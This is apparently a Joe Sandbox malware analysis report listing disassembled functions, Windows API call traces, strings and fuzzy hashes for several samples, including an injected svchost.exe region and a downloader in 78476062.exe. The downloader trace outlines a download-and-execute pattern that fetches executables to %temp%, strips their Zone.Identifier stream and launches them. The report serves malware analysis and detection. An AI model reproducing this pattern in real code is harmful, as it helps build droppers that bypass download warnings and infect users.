Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 1a74b23ad3ece7b71617949816e86c973411c2ca6c1becb6768e039740b44424
Instruction ID: fba1349f99565043b483d636cf4fdc84eebf940d85be02854ad8d851625f0906
Opcode Fuzzy Hash: 1a74b23ad3ece7b71617949816e86c973411c2ca6c1becb6768e039740b44424
Instruction Fuzzy Hash: 9041E430F04209ABCF10DF69CC85AAE7BB5AF45324F148155E819AB392D735D912EF91

Function 00F6DE91 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F6DE88,00F6DCBC,00F6CD15), ref: 00F6DE9F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F6DEAD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F6DEC6
SetLastError.KERNEL32(00000000,00F6DE88,00F6DCBC,00F6CD15), ref: 00F6DF18

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1e4c22e683458f6051b3ce9ad0971c98bc4ea45a50d1e29bc78371734cc425a4
Instruction ID: 5d4189e31c8e4ab654f039dce918fe17e791b8d9e9c47ff4c6cce75f83fc7be2
Opcode Fuzzy Hash: 1e4c22e683458f6051b3ce9ad0971c98bc4ea45a50d1e29bc78371734cc425a4
Instruction Fuzzy Hash: D801D437F09319AEA61426B4ACC557A37A4DB62774B20032EF525990E1EF668C06B741

Function 00F7200D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\2779421088.exe, xrefs: 00F72029

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\2779421088.exe
API String ID: 0-2246690760
Opcode ID: b3654338dde0175994fccacb92c280b646fe671e13268af27f2a383f37f64800
Instruction ID: c14b0d65cc942f311b74509ff2e7fe3e2c4f5df5424a5db7e5fb1c6740be55ab
Opcode Fuzzy Hash: b3654338dde0175994fccacb92c280b646fe671e13268af27f2a383f37f64800
Instruction Fuzzy Hash: 79218BB1600206AF9B60AF69CC819AB77A9AF50364710C51BF91DD7151EB34EC90E7B2

Function 00F7001E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E62508BC,?,?,00000000,00F78ADF,000000FF,?,00F6FFFA,00F700DE,?,00F6FFCB,00000000), ref: 00F70053
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F70065
FreeLibrary.KERNEL32(00000000,?,?,00000000,00F78ADF,000000FF,?,00F6FFFA,00F700DE,?,00F6FFCB,00000000), ref: 00F70087

Strings

mscoree.dll, xrefs: 00F7004C
CorExitProcess, xrefs: 00F7005D

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1fa8989239e70ddd03d60337b78bc5d912f5f67fd524fe066a05ab01aa404e76
Instruction ID: 2afee206098d061f4b7d127e7cf0b8995368d1fdd7a56e8bbf0673deff91c951
Opcode Fuzzy Hash: 1fa8989239e70ddd03d60337b78bc5d912f5f67fd524fe066a05ab01aa404e76
Instruction Fuzzy Hash: 6D016731A4465DEFDB119F50DC09FFEB7B9FB08724F044626E812A2690DBB59900DF51

Function 00F6E0B3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F6E064,00000000,?,00FBB528,?,?,?,00F6E207,00000004,InitializeCriticalSectionEx,00FB2CC0,InitializeCriticalSectionEx), ref: 00F6E0C0
GetLastError.KERNEL32(?,00F6E064,00000000,?,00FBB528,?,?,?,00F6E207,00000004,InitializeCriticalSectionEx,00FB2CC0,InitializeCriticalSectionEx,00000000,?,00F6DF87), ref: 00F6E0CA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F6E0F2

Strings

api-ms-, xrefs: 00F6E0D7

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: d2073e8c36b34a76beaded7a3342bca028cfb661178537925272c97701cce11d
Instruction ID: a7ac5b3aeb8b1053b44ca1aa191ffc97e5dd3db5aed3fd6b8b408983aae8352a
Opcode Fuzzy Hash: d2073e8c36b34a76beaded7a3342bca028cfb661178537925272c97701cce11d
Instruction Fuzzy Hash: 76E01A31788309B6EF211B61ED06BA83A69AB10B61F244020FA0DE90A1DBE5D860AA45

Function 00F755A9 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E62508BC,00000000,00000000,?), ref: 00F7560C

Part of subcall function 00F72BDB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F70D4D,?,00000000,-00000008), ref: 00F72C3C

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F7585E
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F758A4
GetLastError.KERNEL32 ref: 00F75947

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 21ba44b1e8bbdad381574b0a92239d0e67d28217b252380332035ebe4bd85fc9
Instruction ID: 7075a7eb7f027ab8e43a37046961e1b9495c7ed0b484dd0687efaf9063ad305e
Opcode Fuzzy Hash: 21ba44b1e8bbdad381574b0a92239d0e67d28217b252380332035ebe4bd85fc9
Instruction Fuzzy Hash: 6ED18CB5D04648DFCB14CFA8D880AEDBBB5FF08720F24812AE55AEB351D770A942DB51

Function 00F6E5EA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F6E6B1
___AdjustPointer.LIBCMT ref: 00F6E6D4
___AdjustPointer.LIBCMT ref: 00F6E770

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: a404c61f0fe11e8b48edf149d0c963a913a3d23da0e62350d4eec6ca9ac10af4
Instruction ID: 83a5241c30675c277028a2d819a4c9c3d2c162c52e45b25aabd612424fc0c2b7
Opcode Fuzzy Hash: a404c61f0fe11e8b48edf149d0c963a913a3d23da0e62350d4eec6ca9ac10af4
Instruction Fuzzy Hash: C251237BA14206AFDB288F10D941BBAB7A4FF54320F14452DEC164B291E736EC51FB90

Function 00F718A9 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00F72BDB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F70D4D,?,00000000,-00000008), ref: 00F72C3C

GetLastError.KERNEL32 ref: 00F7190D
__dosmaperr.LIBCMT ref: 00F71914
GetLastError.KERNEL32(?,?,?,?), ref: 00F7194E
__dosmaperr.LIBCMT ref: 00F71955

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: f6cb5e8e2ae2a18d7a75f49bcb7481ab63d77572cba20249944cbdc9359a5daf
Instruction ID: f2d52673d5c85ce307970d7746aae98c510f68ad810b830747fe6633541a3954
Opcode Fuzzy Hash: f6cb5e8e2ae2a18d7a75f49bcb7481ab63d77572cba20249944cbdc9359a5daf
Instruction Fuzzy Hash: CE21D331A00205AFDB10AFA9CC9196BB7B9FF40334710C52AF91DD7240DB34ED49A7A2

Function 00F72C7E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00F72C86

Part of subcall function 00F72BDB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F70D4D,?,00000000,-00000008), ref: 00F72C3C

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F72CBE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F72CDE

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: c327debb162007a99c24bd1dca74853362394a0f5877b7856e6e2d3adeb9b1b6
Instruction ID: 64e82f7f25030e78eb079923bd04c415cac7e1d93e2ddb87befcc6aada490326
Opcode Fuzzy Hash: c327debb162007a99c24bd1dca74853362394a0f5877b7856e6e2d3adeb9b1b6
Instruction Fuzzy Hash: E61126B290010A7E776527796CC9DFF3A6CEE943A47248126F409D1101FE68CD01B273

Function 00F76D66 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000), ref: 00F76D7D
GetLastError.KERNEL32(?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000,?,?,?,00F75F3E,00000000), ref: 00F76D89

Part of subcall function 00F76D4F: CloseHandle.KERNEL32(FFFFFFFE,00F76D99,?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000,?,?), ref: 00F76D5F

___initconout.LIBCMT ref: 00F76D99

Part of subcall function 00F76D11: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F76D40,00F7650D,?,?,00F7599B,?,00000000,00000000,?), ref: 00F76D24

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000,?), ref: 00F76DAE

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6445689a28d7384c752364951c38c017a7c7531096627bfb34bc952cff09c9be
Instruction ID: 17d9f972e283fe6b16d502685278552dd217a366a468a0c6f93f9ce2895c2d88
Opcode Fuzzy Hash: 6445689a28d7384c752364951c38c017a7c7531096627bfb34bc952cff09c9be
Instruction Fuzzy Hash: 1FF09836910569BBCF225FE59C099E93F26EB493B1B058511FA1C95120C6728960BB91

Function 00F6EBE6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00F6EC0B

Strings

MOC, xrefs: 00F6EC1D
RCC, xrefs: 00F6EC25

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 966988dcc0e0035f130f4daabe9f754da6629a475b4ce01f2940da0b477bd7cf
Instruction ID: 2d4c8f7cb7fd54368e4f642620b9b1c6d81cd7a29c048d15f1c76a394665648a
Opcode Fuzzy Hash: 966988dcc0e0035f130f4daabe9f754da6629a475b4ce01f2940da0b477bd7cf
Instruction Fuzzy Hash: AD416D76E00209AFCF15DF94CD81AEEBBB5FF48314F184059F904A7251D3359951EB51

Analysis Process: svchost.exePID: 8108, Parent PID: 5536COMMON

Executed Functions

Function 027402D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02740326

Part of subcall function 027400A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027400CD
Part of subcall function 027400A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02740279

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02740378
VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 027403E7
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02740407
MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0274042E
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02740456
CloseHandle.KERNELBASE(?), ref: 02740471

Strings

,, xrefs: 02740356

Memory Dump Source

Source File: 0000000A.00000003.1606319441.0000000002740000.00000040.00000001.00020000.00000000.sdmp, Offset: 02740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2740000_svchost.jbxd

Similarity

API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
String ID: ,
API String ID: 3867569247-3772416878
Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction ID: 6e138d80a7036b8221ef9f6177d194c2e43c0059ed96b007783e3738cbe50937
Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction Fuzzy Hash: 3B612DB5900209EFDB24DFA9C884EDEBBB9FF08354F54851AEA59A7240D730E950CF60

Function 027400A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027400CD
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02740279

Memory Dump Source

Source File: 0000000A.00000003.1606319441.0000000002740000.00000040.00000001.00020000.00000000.sdmp, Offset: 02740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2740000_svchost.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: c50aa7a0acbd5afb525541b077445bd609d580acdee92c2a34ee4062611f966e
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: BE719B71A04249DFDB45CF98C881BEEBBF0AB09314F244495E965FB281C734AA91CF64

Analysis Process: 78476062.exePID: 8160, Parent PID: 7744COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 007C10B0 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 183
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 007C10B9
srand.MSVCR90 ref: 007C10C0
DeleteUrlCacheEntryW.WININET(?), ref: 007C10CC
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C10EA
rand.MSVCR90 ref: 007C10F0
rand.MSVCR90 ref: 007C1104
wsprintfW.USER32 ref: 007C112B
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007C1141
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007C116D
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 007C119C
InternetReadFile.WININET(00000000,?,00000103,?), ref: 007C11CF
WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 007C1200
CloseHandle.KERNEL32(000000FF), ref: 007C120F
wsprintfW.USER32 ref: 007C1228
DeleteFileW.KERNELBASE(?), ref: 007C1238
CloseHandle.KERNEL32(000000FF), ref: 007C1263
InternetCloseHandle.WININET(00000000), ref: 007C1270
InternetCloseHandle.WININET(00000000), ref: 007C127D
Sleep.KERNELBASE(000001F4), ref: 007C1288
rand.MSVCR90 ref: 007C129D
Sleep.KERNEL32 ref: 007C12B4
rand.MSVCR90 ref: 007C12BA
rand.MSVCR90 ref: 007C12CE
wsprintfW.USER32 ref: 007C12F5
DeleteUrlCacheEntryW.WININET(?), ref: 007C1302
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 007C1319
wsprintfW.USER32 ref: 007C1335
DeleteFileW.KERNEL32(?), ref: 007C1345

Strings

%s\%d%d.exe, xrefs: 007C12E9
%s\%d%d.exe, xrefs: 007C111F
%temp%, xrefs: 007C10E5
%s:Zone.Identifier, xrefs: 007C121C
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 007C113C
%s:Zone.Identifier, xrefs: 007C1329

Memory Dump Source

Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true

Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd

Similarity

API ID: File$Internetrand$CloseDeleteHandlewsprintf$CacheEntryOpenSleep$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
API String ID: 3548267932-1161929716
Opcode ID: 92436e855575cb7423ea0a8f66844b4ae0da445e24b07f7d515d5c6737006994
Instruction ID: e6f14b9aafa8f068fd6c928ad25193a0a2c8f3cf9f41f75b110bc137390f4b04
Opcode Fuzzy Hash: 92436e855575cb7423ea0a8f66844b4ae0da445e24b07f7d515d5c6737006994
Instruction Fuzzy Hash: 116196B5A40218ABD724DB60DC49FE97379BB48701F44849DF609921D2DABCABC1CFA4

Function 007C1000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 007C100E
memset.MSVCR90 ref: 007C101E
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 007C1057
Sleep.KERNELBASE(000003E8), ref: 007C1067
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 007C1082
Sleep.KERNEL32(000003E8), ref: 007C109C

Strings

, xrefs: 007C1091
open, xrefs: 007C107B
D, xrefs: 007C1026

Memory Dump Source

Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true

Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 9ea84508498a0b33631f982681277ec9f500aec90134b0348166df45f0945141
Instruction ID: 380d1d813fe4ab1200f41570f7185c99ae2c55429ec6bdeae7f3ec10aa6231ec
Opcode Fuzzy Hash: 9ea84508498a0b33631f982681277ec9f500aec90134b0348166df45f0945141
Instruction Fuzzy Hash: 47115471E80308FBE710DF90CC46FAD7778AB15B01F20411DFA086E2C2D6B95A85CB65

Function 007C13C0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C13DA
wsprintfW.USER32 ref: 007C13F3
PathFileExistsW.KERNELBASE(?), ref: 007C1403
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 007C1429
CloseHandle.KERNELBASE(000000FF), ref: 007C1445

Strings

^Gv, xrefs: 007C1403
%temp%, xrefs: 007C13D5
%s\roapalr.jpg, xrefs: 007C13E7

Memory Dump Source

Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true

Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\roapalr.jpg$%temp%$^Gv
API String ID: 750032643-185382985
